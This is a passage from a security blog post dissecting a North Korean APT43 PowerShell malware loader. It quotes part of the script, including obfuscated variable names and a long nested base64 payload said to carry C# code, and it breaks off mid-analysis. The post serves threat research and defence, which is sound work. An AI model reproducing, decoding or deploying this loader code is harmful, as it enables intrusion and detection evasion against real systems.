lazarusholic

Everyday is lazarus.dayβ

Inside The Shellcode Dissecting North Korean Apt43s Advanced Powershell Loader

2025-11-12, Bloo
https://bloo.io/blog/inside-the-shellcode-dissecting-north-korean-apt43s-advanced-powershell-loader
#APT43

Contents

The PowerShell script analyzed in this document (shell.ps1) was recovered from an unprecedented takedown operation of North Korean APT infrastructure, security researchers gained access to actual malware and operational tools used by Kimsuky/APT43. This rare opportunity allows us to analyze authentic, state-sponsored malware rather than samples collected from targeted organizations.
This analysis provides insight into the advanced techniques employed by nation-state actors to evade detection and maintain persistence in high-value targets.
Overview
The PowerShell script (shell.ps1) is a sophisticated malware loader that goes beyond just containing shellcode. It employs multiple components working together to evade detection, decode payloads, and execute malicious code. This document analyzes the complete structure and components of the script, revealing the technical sophistication of the threat actors’ tooling.
Base64 Encoded C# Code
The script begins by storing multiple layers of base64-encoded data in the $app_process_delete_oxf variable:
$app_process_delete_oxf = ”
$app_process_delete_oxf += auto_process_read_xwj “Vm0wd2QyUXlWa1pPVldScFVtMVNXRll3Wkc5V2JHeDBaRWhrVlUxV2NEQlVWbHBQVjBaYWMySkVUbGhoTVVwVVZqQmFTMlJIVmtWUmJVWlhWbXhzTTFadGNFZFRNbEpJVm10c2FWSnRhRzlVVjNOM1pVWmFkRTFVVWxSTmF6RTFWa2QwVjFVeVNrbFJhemxXWWxSV1JGcFdXbUZrUjFKSFYyMTRVMkpIZHpCV01uUnZVakZXZEZOcmJGSmhlbXhXVm10V1MxUkdWbk5YYlVacVlraENSbFpYZUhkV01ERldZMFZ3VjJKSFVqTlhWbHBoVTBaT2NtRkdXbWxTYTNCWFZtMTBWMlF5VW5OWGJHUllZbGhTV0ZSV1pGTk5SbFowWlVaT2FHWnNjSGxXTVZKSFZqSkZlVlZZWkZwV1JWcHlWVEJhVDJOdFNrZFRiV3hvWld4YWIxWnRNVEJXTVUxNVZtNU9WbUpHV2xSWmJHaFRWMFpTVjFkdFJteFdiVko1VjJ0ak5WWlhTa2RqUm5CV1ZqTkNXRlpxUmtwbGJVWklZVVp3YkdFeGNEWldiWEJIVkRKU1YxZHVUbFJpVjNodlZGVm9RMWRzV1hoWGJFNVRUVmQ0V1ZWdGRHdGhiRXB6WTBac1dtRXlhRVJaZWtaaFkxWkdWVkpzVGs1V01VbzFWbXBKZUUxSFJrZFhiazVxVTBoQ1lWbFhjekZqYkZweFVtMUdVMkpWYkRaWGExcDNZa2RGZWxGcmJGaFhTRUpJVmtSR2ExZEdVbkphUm1ocFZqTm9WVmRXVWs5Uk1XUkhWMjVTVGxOSGFGQlZha1pIVFRGU1YyRkZPV2hpUlhCWVZqSjRVMWR0U2tkWGJXaFhZVEZ3ZWxreU1VZFNiRkp6Vkcxc1UySnJTbUZXTW5oWFdWWlJlRmRzYUZSaE1YQnhWV3hrVTFkR1VsaE9WemxPVFZad2VGVnRNVWRWTWtwV1ZtcGFXbFpXY0hKWlZXUkdaVWRPU0U5V2FHaE5WbkJ2Vm10U1MxVXhXWGhWYmxaVllrWndjRlpxVG05a2JGcEhWbTFHVjJGNlJsTlZSbEYzVUZFOVBRPT0=” 11
This encoded data is then decoded and stored in $random_memory_search_adk:
$random_memory_search_adk …